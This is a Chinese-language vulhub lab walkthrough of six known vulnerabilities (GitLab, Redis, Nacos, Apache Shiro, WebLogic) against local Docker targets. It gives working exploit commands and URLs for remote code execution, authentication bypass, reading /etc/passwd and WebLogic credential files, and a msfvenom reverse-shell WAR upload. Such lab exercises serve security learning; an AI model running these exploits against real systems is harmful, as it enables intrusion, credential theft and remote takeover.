一、Gitlab遠程代碼執行（CVE-2021-22205）

docker-compose up -d # 開啟容器

直接使用該腳本poc.py，命令如下：

python poc.py http://192.168.92.6:8080 "touch /tmp/success"

二、Redis主從復制遠程命令執行

docker-compose up -d # 開啟容器
redis-cli -h 127.0.0.1 # 連接redis數據庫，會發現未授權

redis-rogue-getshel

python redis-master.py -r 192.168.92.6 -p 6379 -L 192.168.92.6 -P 8888 -f RedisModulesSDK/exp.so -c "id"

三、Nacos認證繞過漏洞（CVE-2021-29441）

如果nacos服務沒有啟動，可以使用docker-compose restart nacos。

1. 訪問http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=10可以查看用戶名和密碼，注意：User-Agent: Nacos-Server。
   
2. 添加新用戶http://127.0.0.1:8848/nacos/v1/auth/users?username=vulhub&password=vulhub，注意：POST數據包。
   
3. 登錄Nacoshttp://127.0.0.1:8848/nacos#login
   
   

四、Apache Shiro認證繞過漏洞（CVE-2020-1957）

Apache Shiro是一款開源安全框架，提供身份驗證、授權、密碼學和會話管理。
訪問192.168.92.16:8080/admin/，顯示302跳轉

構造惡意路徑，訪問192.168.92.16:8080/xxx/..;/admin/,可繞過權限校驗，訪問到管理頁面：

五、Gitlab任意文件讀取漏洞（CVE-2016-9086）

訪問192.168.92.16:8080，用戶名為root，密碼為vulhub123456。



在導入頁面，將test.tar.gz上傳，將會讀取到/etc/passwd文件內容：

六、weblogic文件讀取漏洞

1、弱口令

訪問192.168.92.6:7001/console，用戶名為weblogic，密碼為Oracle@123。

常見弱口令

2、任意文件讀取漏洞

訪問192.168.92.6:7001/hello/file.jsp?path=/etc/passwd，實現任意文件下載。

3、讀取后臺用戶密文與密鑰文件

weblogic密碼使用AES（老版本3DES）加密，對稱加密可解密，只需要找到用戶的密文與加密時的密鑰即可。這兩個文件均位于base_domain下，名為SerializedSystemIni.dat和config.xml，在本環境中為./security/SerializedSystemIni.dat和./config/config.xml。

`SerializedSystemIni.dat`是一個二進制文件，所以一定要用burpsuite來讀取，用瀏覽器直接下載可能引入一些干擾字符。在burp里選中讀取到的那一串亂碼，右鍵`copy to file`就可以保存成一個文件：

config.xml是base_domain的全局配置文件，所以亂七八糟的內容比較多，找到其中的<node-manager-password-encrypted>的值，即為加密后的管理員密碼：

注意：

1. 在保存這個test.dat時，最好在HEX模式下進行復制。不然可能回報這個錯：Null input buffer
   
2. 如果報錯：PBEWITHSHAAND128BITRC2-CBC SecretKeyFactory not available，需要手動下載bcprov-jdk15on-1.56.jar，并放在<java目錄>/jre/lib/ext/目錄下。

4、后臺上傳webshell

使用msfvenom生成war包的反彈shell

msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f war -o shell.war

然后瘋狂下一步，直到完成。點擊我們剛剛部署的war包，然后啟動即可獲取反彈shell。